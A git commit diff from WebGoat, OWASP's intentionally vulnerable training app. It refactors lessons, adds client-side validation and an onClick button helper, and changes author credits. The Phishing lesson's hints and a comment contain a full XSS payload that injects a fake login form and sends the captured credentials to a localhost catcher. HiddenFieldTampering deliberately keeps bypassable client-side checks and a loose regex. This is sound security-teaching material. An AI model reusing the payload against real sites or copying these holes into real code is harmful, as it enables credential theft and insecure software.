dubey/WebGoat
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Added client side validation to HiddenFieldTampering.java, added a new ECS makeButton with a OnClick function, corrected authorship in several files

Browse Source 
git-svn-id: http://webgoat.googlecode.com/svn/trunk@220 4033779f-a91e-0410-96ef-6bf7bf53c507
This commit is contained in:
mayhew64 2008-01-09 13:28:07 +00:00
parent 3645564018
commit 84ca966ce5
9 changed files with 1354 additions and 1336 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/BlindSqlInjection.java
View File

@ -46,7 +46,7 @@ import org.owasp.webgoat.session.WebSession;
* For details, please see http://code.google.com/p/webgoat/ * For details, please see http://code.google.com/p/webgoat/
* *
* @author Chuck Willis <a href="http://www.securityfoundry.com">Chuck's web * @author Chuck Willis <a href="http://www.securityfoundry.com">Chuck's web
* site</a> (this lesson is heavily based on Jeff Williams' SQL * site</a> (this lesson is heavily based on Bruce Mayhews' SQL
* Injection lesson * Injection lesson
* @created January 14, 2005 * @created January 14, 2005
*/ */

2
webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/DOS_Login.java
View File

@ -53,7 +53,7 @@ import org.owasp.webgoat.session.ParameterNotFoundException;
* *
* For details, please see http://code.google.com/p/webgoat/ * For details, please see http://code.google.com/p/webgoat/
* *
* @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a> * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
* @created October 28, 2003 * @created October 28, 2003
*/ */
public class DOS_Login extends LessonAdapter public class DOS_Login extends LessonAdapter

98
webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/HiddenFieldTampering.java
View File

@ -2,9 +2,11 @@ package org.owasp.webgoat.lessons;
import java.util.ArrayList; import java.util.ArrayList;
import java.util.List; import java.util.List;
import java.util.regex.Pattern;
import org.apache.ecs.Element; import org.apache.ecs.Element;
import org.apache.ecs.ElementContainer; import org.apache.ecs.ElementContainer;
import org.apache.ecs.StringElement;
import org.apache.ecs.html.A; import org.apache.ecs.html.A;
import org.apache.ecs.html.B; import org.apache.ecs.html.B;
import org.apache.ecs.html.BR; import org.apache.ecs.html.BR;
@ -50,11 +52,16 @@ import org.owasp.webgoat.session.WebSession;
* For details, please see http://code.google.com/p/webgoat/ * For details, please see http://code.google.com/p/webgoat/
* *
* @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a> * @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
* @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
* @created October 28, 2003 * @created October 28, 2003
*/ */
public class HiddenFieldTampering extends LessonAdapter public class HiddenFieldTampering extends LessonAdapter
{ {
public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com").addElement(new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0).setVspace(0)); public final static A ASPECT_LOGO =
new A().setHref("http://www.aspectsecurity.com").addElement(
new IMG("images/logos/aspect.jpg")
.setAlt("Aspect Security").setBorder(0)
.setHspace(0).setVspace(0));
private final static String PRICE = "Price"; private final static String PRICE = "Price";
@ -62,37 +69,56 @@ public class HiddenFieldTampering extends LessonAdapter
private final static String PRICE_TV_HACKED = "9.99"; private final static String PRICE_TV_HACKED = "9.99";
String regex = "^" + PRICE_TV + "$"; // obviously the "." will match any char - any interesting exploit!
Pattern pattern1 = Pattern.compile(regex);
String lineSep = System.getProperty("line.separator");
String script =
"<SCRIPT>" + lineSep + "regex=/" + regex + "/;" + "function validate() { " + lineSep
+ "if (!regex.test(document.form." + PRICE + ".value)) {alert('Data tampering is disallowed'); "
+" document.form." + PRICE + ".value = " + PRICE_TV + ";}"
+ lineSep + "else document.form.submit();" + lineSep + "} " + lineSep + "</SCRIPT>" + lineSep;
/** /**
* Constructor for the HiddenFieldScreen object * Constructor for the HiddenFieldScreen object
*/ */
public HiddenFieldTampering() public HiddenFieldTampering()
{} {
}
/** /**
* Description of the Method * Description of the Method
* *
* @param s Description of the Parameter * @param s
* Description of the Parameter
* @return Description of the Return Value * @return Description of the Return Value
*/ */
protected Element createContent(WebSession s) protected Element createContent(WebSession s)
{ {
ElementContainer ec = new ElementContainer(); ElementContainer ec = new ElementContainer();
ec.addElement(new StringElement(script));
float quantity;
float total;
String price = PRICE_TV;
try try
{ {
String price = s.getParser().getRawParameter(PRICE, PRICE_TV); price = s.getParser().getRawParameter(PRICE, PRICE_TV);
float quantity = s.getParser().getFloatParameter("QTY", 1.0f); quantity = s.getParser().getFloatParameter("QTY", 1.0f);
float total = quantity * Float.parseFloat(price); total = quantity * Float.parseFloat(price);
}
catch (Exception e)
{
s.setMessage("Invaild data " + this.getClass().getName());
price = PRICE_TV;
quantity = 1.0f;
total = quantity * Float.parseFloat(PRICE_TV);
}
if (price.equals(PRICE_TV)) if (price.equals(PRICE_TV))
{ {
ec.addElement(new Center().addElement(new H1() ec.addElement(new Center().addElement(new H1().addElement("Shopping Cart ")));
.addElement("Shopping Cart ")));
ec.addElement(new BR()); ec.addElement(new BR());
Table t = new Table().setCellSpacing(0).setCellPadding(2) Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1).setWidth("90%").setAlign("center");
.setBorder(1).setWidth("90%").setAlign("center");
if (s.isColor()) if (s.isColor())
{ {
@ -100,26 +126,22 @@ public class HiddenFieldTampering extends LessonAdapter
} }
TR tr = new TR(); TR tr = new TR();
tr.addElement(new TH().addElement( tr.addElement(new TH().addElement("Shopping Cart Items -- To Buy Now").setWidth("80%"));
"Shopping Cart Items -- To Buy Now").setWidth("80%"));
tr.addElement(new TH().addElement("Price:").setWidth("10%")); tr.addElement(new TH().addElement("Price:").setWidth("10%"));
tr.addElement(new TH().addElement("Quantity:").setWidth("3%")); tr.addElement(new TH().addElement("Quantity:").setWidth("3%"));
tr.addElement(new TH().addElement("Total").setWidth("7%")); tr.addElement(new TH().addElement("Total").setWidth("7%"));
t.addElement(tr); t.addElement(tr);
tr = new TR(); tr = new TR();
tr.addElement(new TD() tr.addElement(new TD().addElement("56 inch HDTV (model KTV-551)"));
.addElement("56 inch HDTV (model KTV-551)"));
tr.addElement(new TD().addElement(PRICE_TV).setAlign("right")); tr.addElement(new TD().addElement(PRICE_TV).setAlign("right"));
tr.addElement(new TD().addElement( tr.addElement(new TD().addElement(new Input(Input.TEXT, "QTY", 1)).setAlign("right"));
new Input(Input.TEXT, "QTY", 1)).setAlign("right"));
tr.addElement(new TD().addElement("$" + total)); tr.addElement(new TD().addElement("$" + total));
t.addElement(tr); t.addElement(tr);
ec.addElement(t); ec.addElement(t);
t = new Table().setCellSpacing(0).setCellPadding(2) t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
.setBorder(0).setWidth("90%").setAlign("center");
if (s.isColor()) if (s.isColor())
{ {
@ -128,13 +150,10 @@ public class HiddenFieldTampering extends LessonAdapter
ec.addElement(new BR()); ec.addElement(new BR());
tr = new TR(); tr = new TR();
tr.addElement(new TD() tr.addElement(new TD().addElement("The total charged to your credit card:"));
.addElement("The total charged to your credit card:"));
tr.addElement(new TD().addElement("$" + total)); tr.addElement(new TD().addElement("$" + total));
tr.addElement(new TD().addElement(ECSFactory tr.addElement(new TD().addElement(ECSFactory.makeButton("Update Cart")));
.makeButton("Update Cart"))); tr.addElement(new TD().addElement(ECSFactory.makeButton("Purchase", "validate()")));
tr.addElement(new TD().addElement(ECSFactory
.makeButton("Purchase")));
t.addElement(tr); t.addElement(tr);
ec.addElement(t); ec.addElement(t);
@ -143,8 +162,7 @@ public class HiddenFieldTampering extends LessonAdapter
ec.addElement(input); ec.addElement(input);
ec.addElement(new BR()); ec.addElement(new BR());
} } else
else
{ {
if (!price.toString().equals(PRICE_TV)) if (!price.toString().equals(PRICE_TV))
{ {
@ -154,21 +172,12 @@ public class HiddenFieldTampering extends LessonAdapter
ec.addElement(new P().addElement("Your total price is:")); ec.addElement(new P().addElement("Your total price is:"));
ec.addElement(new B("$" + total)); ec.addElement(new B("$" + total));
ec.addElement(new BR()); ec.addElement(new BR());
ec ec.addElement(new P().addElement("This amount will be charged to your credit card immediately."));
.addElement(new P()
.addElement("This amount will be charged to your credit card immediately."));
}
}
catch (Exception e)
{
s.setMessage("Error generating " + this.getClass().getName());
e.printStackTrace();
} }
return (ec); return (ec);
} }
/** /**
* DOCUMENT ME! * DOCUMENT ME!
* *
@ -179,7 +188,6 @@ public class HiddenFieldTampering extends LessonAdapter
return Category.UNVALIDATED_PARAMETERS; return Category.UNVALIDATED_PARAMETERS;
} }
/** /**
* Gets the hints attribute of the HiddenFieldScreen object * Gets the hints attribute of the HiddenFieldScreen object
* *
@ -188,10 +196,8 @@ public class HiddenFieldTampering extends LessonAdapter
protected List<String> getHints(WebSession s) protected List<String> getHints(WebSession s)
{ {
List<String> hints = new ArrayList<String>(); List<String> hints = new ArrayList<String>();
hints hints.add("This application is using hidden fields to transmit price information to the server.");
.add("This application is using hidden fields to transmit price information to the server."); hints.add("Use a program to intercept and change the value in the hidden field.");
hints
.add("Use a program to intercept and change the value in the hidden field.");
hints hints
.add("Use <A href=\"http://www.owasp.org/development/webscarab\">WebScarab</A> to change the price of the TV from " .add("Use <A href=\"http://www.owasp.org/development/webscarab\">WebScarab</A> to change the price of the TV from "
+ PRICE_TV + " to " + PRICE_TV_HACKED + "."); + PRICE_TV + " to " + PRICE_TV_HACKED + ".");
@ -199,7 +205,6 @@ public class HiddenFieldTampering extends LessonAdapter
return hints; return hints;
} }
/** /**
* Gets the instructions attribute of the HiddenFieldTampering object * Gets the instructions attribute of the HiddenFieldTampering object
* *
@ -207,20 +212,19 @@ public class HiddenFieldTampering extends LessonAdapter
*/ */
public String getInstructions(WebSession s) public String getInstructions(WebSession s)
{ {
String instructions = "Try to purchase the HDTV for less than the purchase price, if you have not done so already."; String instructions =
"Try to purchase the HDTV for less than the purchase price, if you have not done so already.";
return (instructions); return (instructions);
} }
private final static Integer DEFAULT_RANKING = new Integer(50); private final static Integer DEFAULT_RANKING = new Integer(50);
protected Integer getDefaultRanking() protected Integer getDefaultRanking()
{ {
return DEFAULT_RANKING; return DEFAULT_RANKING;
} }
/** /**
* Gets the title attribute of the HiddenFieldScreen object * Gets the title attribute of the HiddenFieldScreen object
* *

2
webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/HttpBasics.java
View File

@ -39,7 +39,7 @@ import org.owasp.webgoat.session.WebSession;
* *
* For details, please see http://code.google.com/p/webgoat/ * For details, please see http://code.google.com/p/webgoat/
* *
* @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a> * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
* @created October 28, 2003 * @created October 28, 2003
*/ */
public class HttpBasics extends LessonAdapter public class HttpBasics extends LessonAdapter

168
webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/Phishing.java
View File

@ -61,28 +61,28 @@ public class Phishing extends LessonAdapter
protected final static String SEARCH = "Username"; protected final static String SEARCH = "Username";
private String searchText; private String searchText;
/** /**
* Description of the Method * Description of the Method
* *
* @param s Description of the Parameter * @param s
* Description of the Parameter
* @return Description of the Return Value * @return Description of the Return Value
*/ */
private boolean postedCredentials(WebSession s) private boolean postedCredentials(WebSession s)
{ {
String postedToCookieCatcher = getLessonTracker(s).getLessonProperties() String postedToCookieCatcher =
.getProperty(Catcher.PROPERTY, Catcher.EMPTY_STRING); getLessonTracker(s).getLessonProperties().getProperty(Catcher.PROPERTY, Catcher.EMPTY_STRING);
// <START_OMIT_SOURCE> // <START_OMIT_SOURCE>
return (!postedToCookieCatcher.equals(Catcher.EMPTY_STRING)); return (!postedToCookieCatcher.equals(Catcher.EMPTY_STRING));
// <END_OMIT_SOURCE> // <END_OMIT_SOURCE>
} }
/** /**
* Description of the Method * Description of the Method
* *
* @param s Description of the Parameter * @param s
* Description of the Parameter
* @return Description of the Return Value * @return Description of the Return Value
*/ */
protected Element createContent(WebSession s) protected Element createContent(WebSession s)
@ -109,14 +109,12 @@ public class Phishing extends LessonAdapter
return (ec); return (ec);
} }
protected Element makeSearch(WebSession s) protected Element makeSearch(WebSession s)
{ {
ElementContainer ec = new ElementContainer(); ElementContainer ec = new ElementContainer();
ec.addElement(new H1().addElement("WebGoat Search ")); ec.addElement(new H1().addElement("WebGoat Search "));
Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0) Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setAlign("center");
.setAlign("center");
TR tr = new TR(); TR tr = new TR();
tr.addElement(new TD().addElement("&nbsp;").setColSpan(2)); tr.addElement(new TD().addElement("&nbsp;").setColSpan(2));
@ -127,11 +125,8 @@ public class Phishing extends LessonAdapter
} }
tr = new TR(); tr = new TR();
tr tr.addElement(new TH().addElement("This facility will search the WebGoat source.").setColSpan(2)
.addElement(new TH() .setAlign("center"));
.addElement(
"This facility will search the WebGoat source.")
.setColSpan(2).setAlign("center"));
t.addElement(tr); t.addElement(tr);
tr = new TR(); tr = new TR();
@ -165,7 +160,6 @@ public class Phishing extends LessonAdapter
return (ec); return (ec);
} }
/** /**
* Gets the hints attribute of the CluesScreen object * Gets the hints attribute of the CluesScreen object
* *
@ -174,63 +168,87 @@ public class Phishing extends LessonAdapter
protected List<String> getHints(WebSession s) protected List<String> getHints(WebSession s)
{ {
List<String> hints = new ArrayList<String>(); List<String> hints = new ArrayList<String>();
hints.add("Try adding HTML to the search field to create a fake authentication form.<BR>"
+ "Try to make the form look official.");
hints hints
.add("Try adding HTML to the search field to create a fake authentication form.<BR>" + .add("Try: <BR> "
"Try to make the form look official."); + "password&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
hints.add("Try: <BR> " + + "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; "
"password&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2" + + "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
"&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; " + + "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
"name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; " + hints
"name = &quot;pass&quot;&gt;&lt;br&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;"); .add("Add functionality that can post a request, a button might work<BR><BR>"
hints.add("Add functionality that can post a request, a button might work<BR><BR>" + + "After getting the button on the page, don't forget you will need to steal the credentials and post them to: <BR>"
"After getting the button on the page, don't forget you will need to steal the credentials and post them to: <BR>" + + "http://localhost./WebGoat/capture/PROPERTY=yes&ADD_CREDENTIALS_HERE");
"http://localhost./WebGoat/capture/PROPERTY=yes&ADD_CREDENTIALS_HERE"); hints
hints.add("Try: <BR> " + .add("Try: <BR> "
"&lt;input type=&quot;submit&quot; name=&quot;login&quot; " + + "&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
"value=&quot;login&quot;&gt;"+ + "value=&quot;login&quot;&gt;"
"<BR><BR>Solution for this hint:<BR><BR>" + + "<BR><BR>Solution for this hint:<BR><BR>"
"password&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2" + + "password&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
"&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; " + + "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; "
"name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; " + + "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
"name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; " + + "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
"value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;"); + "value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
hints.add("Make the button perform an action on submit, <BR>" + hints
"adding an onclick=\"hack()\" might work<BR>"+ .add("Make the button perform an action on submit, <BR>"
"Don't forget to add the hack() javascript function" + + "adding an onclick=\"hack()\" might work<BR>"
"<BR><BR>Solution for this hint:<BR><BR>" + + "Don't forget to add the hack() javascript function"
"password&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2" + + "<BR><BR>Solution for this hint:<BR><BR>"
"&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; " + + "password&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
"name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; " + + "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; "
"name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; " + + "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
"value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;"); + "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
hints.add("You need to create the hack() function. This function will pull the credentials from the " + + "value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
"webpage and post them to the WebGoat catcher servlet. <BR>" + hints
"<BR> Some useful code snippets:<UL>" + .add("You need to create the hack() function. This function will pull the credentials from the "
"<LI>doucument.forms[0].user.value - will access the user field" + + "webpage and post them to the WebGoat catcher servlet. <BR>"
"<LI>XssImage = new Image(); XssImage.src=SOME_URL = will perform a post" + + "<BR> Some useful code snippets:<UL>"
"<LI>javascript string concatentation uses a \"+\" </UL>" + + "<LI>doucument.forms[0].user.value - will access the user field"
"<BR><BR>Solution for this hint():<BR><BR>" + + "<LI>XssImage = new Image(); XssImage.src=SOME_URL = will perform a post"
"password&lt;script&gt;function hack(){ alert(&quot;Had this been a real attack... Your credentials were just stolen." + + "<LI>javascript string concatentation uses a \"+\" </UL>"
"\nUser Name = &quot; + document.forms(0).user.value + &quot;\nPassword = &quot; + document.forms(0).pass.value); " + + "<BR><BR>Solution for this hint():<BR><BR>"
"XSSImage=new Image; XSSImage.src=&quot;http://localhost./WebGoat/catcher?PROPERTY=yes&amp;user=&quot;+" + + "password&lt;script&gt;function hack(){ alert(&quot;Had this been a real attack... Your credentials were just stolen."
"document.forms(0).user.value + &quot;&amp;password=&quot; + document.forms(0).pass.value + &quot;&quot;;}" + + "\nUser Name = &quot; + document.forms(0).user.value + &quot;\nPassword = &quot; + document.forms(0).pass.value); "
"&lt;/script&gt;"); + "XSSImage=new Image; XSSImage.src=&quot;http://localhost./WebGoat/catcher?PROPERTY=yes&amp;user=&quot;+"
hints.add("Complete solution for this lesson:<BR><BR>" + + "document.forms(0).user.value + &quot;&amp;password=&quot; + document.forms(0).pass.value + &quot;&quot;;}"
"password&lt;script&gt;function hack(){ alert(&quot;Had this been a real attack... Your credentials were just stolen." + + "&lt;/script&gt;");
"\nUser Name = &quot; + document.forms(0).user.value + &quot;\nPassword = &quot; + document.forms(0).pass.value); " + hints
"XSSImage=new Image; XSSImage.src=&quot;http://localhost./WebGoat/catcher?PROPERTY=yes&amp;user=&quot;+" + .add("Complete solution for this lesson:<BR><BR>"
"document.forms(0).user.value + &quot;&amp;password=&quot; + document.forms(0).pass.value + &quot;&quot;;}" + + "password&lt;script&gt;function hack(){ alert(&quot;Had this been a real attack... Your credentials were just stolen."
"&lt;/script&gt;&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2" + + "\nUser Name = &quot; + document.forms(0).user.value + &quot;\nPassword = &quot; + document.forms(0).pass.value); "
"&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; " + + "XSSImage=new Image; XSSImage.src=&quot;http://localhost./WebGoat/catcher?PROPERTY=yes&amp;user=&quot;+"
"name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; " + + "document.forms(0).user.value + &quot;&amp;password=&quot; + document.forms(0).pass.value + &quot;&quot;;}"
"name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; " + + "&lt;/script&gt;&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
"value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;"); + "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; "
+ "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
+ "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
+ "value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
/** /**
* password<script>function hack(){ alert("Had this been a real attack... Your credentials were just stolen.\nUser Name = " + document.forms(0).user.value + "\nPassword = " + document.forms(0).pass.value); XSSImage=new Image; XSSImage.src="http://localhost./WebGoat/catcher?PROPERTY=yes&user="+document.forms(0).user.value + "&password=" + document.forms(0).pass.value + "";}</script><form><br><br><HR><H3>This feature requires account login:</H2><br><br>Enter Username:<br><input type="text" id="user" name="user"><br>Enter Password:<br><input type="password" name = "pass"><br><input type="submit" name="login" value="login" onclick="hack()"></form><br><br><HR> <!-- * password<script>function hack(){ alert("Had this been a real
* attack... Your credentials were just stolen.\nUser Name = " +
* document.forms(0).user.value + "\nPassword = " +
* document.forms(0).pass.value); XSSImage=new Image;
* XSSImage.src="http://localhost./WebGoat/catcher?PROPERTY=yes&user="+document.forms(0).user.value +
* "&password=" + document.forms(0).pass.value + "";}</script><form><br>
* <br>
* <HR>
* <H3>This feature requires account login:</H2>
* <br>
* <br>
* Enter Username:<br>
* <input type="text" id="user" name="user"><br>
* Enter Password:<br>
* <input type="password" name = "pass"><br>
* <input type="submit" name="login" value="login" onclick="hack()"></form><br>
* <br>
* <HR>
* <!--
* *
*/ */
return hints; return hints;
} }
/** /**
* Gets the instructions attribute of the XssSearch object * Gets the instructions attribute of the XssSearch object
* *
@ -238,26 +256,25 @@ public class Phishing extends LessonAdapter
*/ */
public String getInstructions(WebSession s) public String getInstructions(WebSession s)
{ {
String instructions = "This lesson is an example of how a website might support a phishing attack<BR><BR>" + String instructions =
"Below is an example of a standard search feature.<br>" + "This lesson is an example of how a website might support a phishing attack<BR><BR>"
"Using XSS and HTML insertion, your goal is to: <UL>" + + "Below is an example of a standard search feature.<br>"
"<LI>Insert html to that requests credentials" + + "Using XSS and HTML insertion, your goal is to: <UL>"
"<LI>Add javascript to actually collect the credentials" + + "<LI>Insert html to that requests credentials"
"<LI>Post the credentials to http://localhost./WebGoat/catcher?PROPERTY=yes...</UL> " + + "<LI>Add javascript to actually collect the credentials"
"To pass this lesson, the credentials must be posted to the catcher servlet.<BR>"; + "<LI>Post the credentials to http://localhost./WebGoat/catcher?PROPERTY=yes...</UL> "
+ "To pass this lesson, the credentials must be posted to the catcher servlet.<BR>";
return (instructions); return (instructions);
} }
private final static Integer DEFAULT_RANKING = new Integer(30); private final static Integer DEFAULT_RANKING = new Integer(30);
protected Integer getDefaultRanking() protected Integer getDefaultRanking()
{ {
return DEFAULT_RANKING; return DEFAULT_RANKING;
} }
/** /**
* Gets the category attribute of the FailOpenAuthentication object * Gets the category attribute of the FailOpenAuthentication object
* *
@ -268,7 +285,6 @@ public class Phishing extends LessonAdapter
return Category.XSS; return Category.XSS;
} }
/** /**
* Gets the title attribute of the CluesScreen object * Gets the title attribute of the CluesScreen object
* *

2
webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/admin/UserAdminScreen.java
View File

@ -41,7 +41,7 @@ import org.owasp.webgoat.session.WebSession;
* *
* For details, please see http://code.google.com/p/webgoat/ * For details, please see http://code.google.com/p/webgoat/
* *
* @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a> * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
* @created October 28, 2003 * @created October 28, 2003
*/ */
public class UserAdminScreen extends LessonAdapter public class UserAdminScreen extends LessonAdapter

4
webgoat/main/project/JavaSource/org/owasp/webgoat/session/Course.java
View File

@ -419,8 +419,8 @@ public class Course
} }
if(absoluteFile.startsWith("/lesson_solutions") && absoluteFile.endsWith(".html") && className.endsWith(fileName)) if(absoluteFile.startsWith("/lesson_solutions") && absoluteFile.endsWith(".html") && className.endsWith(fileName))
{ {
System.out.println("DEBUG: setting lesson solution file " + absoluteFile + " for lesson " + lesson.getClass().getName()); //System.out.println("DEBUG: setting lesson solution file " + absoluteFile + " for lesson " + lesson.getClass().getName());
System.out.println("fileName: " + fileName + " == className: " + className ); //System.out.println("fileName: " + fileName + " == className: " + className );
lesson.setLessonSolutionFileName(absoluteFile); lesson.setLessonSolutionFileName(absoluteFile);
} }
} }

9
webgoat/main/project/JavaSource/org/owasp/webgoat/session/ECSFactory.java
View File

@ -116,6 +116,15 @@ public class ECSFactory
return (b); return (b);
} }
public static Element makeButton(String text, String onClickFunction)
{
Input b = (Input)makeButton(text);
b.setOnClick(onClickFunction);
return (b);
}
/** /**
* Description of the Method * Description of the Method

473
webgoat/main/project/JavaSource/org/owasp/webgoat/session/ParameterParser.java
View File

@ -43,27 +43,30 @@ import org.owasp.webgoat.util.HtmlEncoder;
public class ParameterParser public class ParameterParser
{ {
private final static String ALLOWED_CHARACTERS = "$()-?.@!,:;=//+"; // Don't allow #& specifically private final static String ALLOWED_CHARACTERS = "$()-?.@!,:;=//+"; // Don't
// allow
// #&
// specifically
private ServletRequest request; private ServletRequest request;
/** /**
* Constructs a new ParameterParser to handle the parameters of the given * Constructs a new ParameterParser to handle the parameters of the given
* request. * request.
* *
*@param request the servlet request * @param request
* the servlet request
*/ */
public ParameterParser(ServletRequest request) public ParameterParser(ServletRequest request)
{ {
this.request = request; this.request = request;
} }
/** /**
* Description of the Method * Description of the Method
* *
*@param s Description of the Parameter * @param s
* Description of the Parameter
* @return Description of the Return Value * @return Description of the Return Value
*/ */
private String clean(String s) private String clean(String s)
@ -74,12 +77,10 @@ public class ParameterParser
{ {
char c = s.charAt(loop); char c = s.charAt(loop);
if (Character.isLetterOrDigit(c) || Character.isWhitespace(c) if (Character.isLetterOrDigit(c) || Character.isWhitespace(c) || (ALLOWED_CHARACTERS.indexOf(c) != -1))
|| (ALLOWED_CHARACTERS.indexOf(c) != -1))
{ {
clean.append(c); clean.append(c);
} } else
else
{ {
clean.append('.'); clean.append('.');
} }
@ -88,27 +89,28 @@ public class ParameterParser
return (clean.toString()); return (clean.toString());
} }
/** /**
* Gets the named parameter value as a boolean * Gets the named parameter value as a boolean
* *
*@param name the parameter name * @param name
* the parameter name
* @return the parameter value as a boolean * @return the parameter value as a boolean
*@exception ParameterNotFoundException if the parameter was not found * @exception ParameterNotFoundException
* if the parameter was not found
*/ */
public boolean getBooleanParameter(String name) public boolean getBooleanParameter(String name) throws ParameterNotFoundException
throws ParameterNotFoundException
{ {
return new Boolean(getStringParameter(name)).booleanValue(); return new Boolean(getStringParameter(name)).booleanValue();
} }
/** /**
* Gets the named parameter value as a boolean, with a default. Returns the * Gets the named parameter value as a boolean, with a default. Returns the
* default value if the parameter is not found. * default value if the parameter is not found.
* *
*@param name the parameter name * @param name
*@param def the default parameter value * the parameter name
* @param def
* the default parameter value
* @return the parameter value as a boolean, or the default * @return the parameter value as a boolean, or the default
*/ */
public boolean getBooleanParameter(String name, boolean def) public boolean getBooleanParameter(String name, boolean def)
@ -123,13 +125,15 @@ public class ParameterParser
} }
} }
/** /**
* Gets the booleanSubParameter attribute of the ParameterParser object * Gets the booleanSubParameter attribute of the ParameterParser object
* *
*@param first Description of the Parameter * @param first
*@param next Description of the Parameter * Description of the Parameter
*@param def Description of the Parameter * @param next
* Description of the Parameter
* @param def
* Description of the Parameter
* @return The booleanSubParameter value * @return The booleanSubParameter value
*/ */
public boolean getBooleanSubParameter(String first, String next, boolean def) public boolean getBooleanSubParameter(String first, String next, boolean def)
@ -144,30 +148,31 @@ public class ParameterParser
} }
} }
/** /**
* Gets the named parameter value as a byte * Gets the named parameter value as a byte
* *
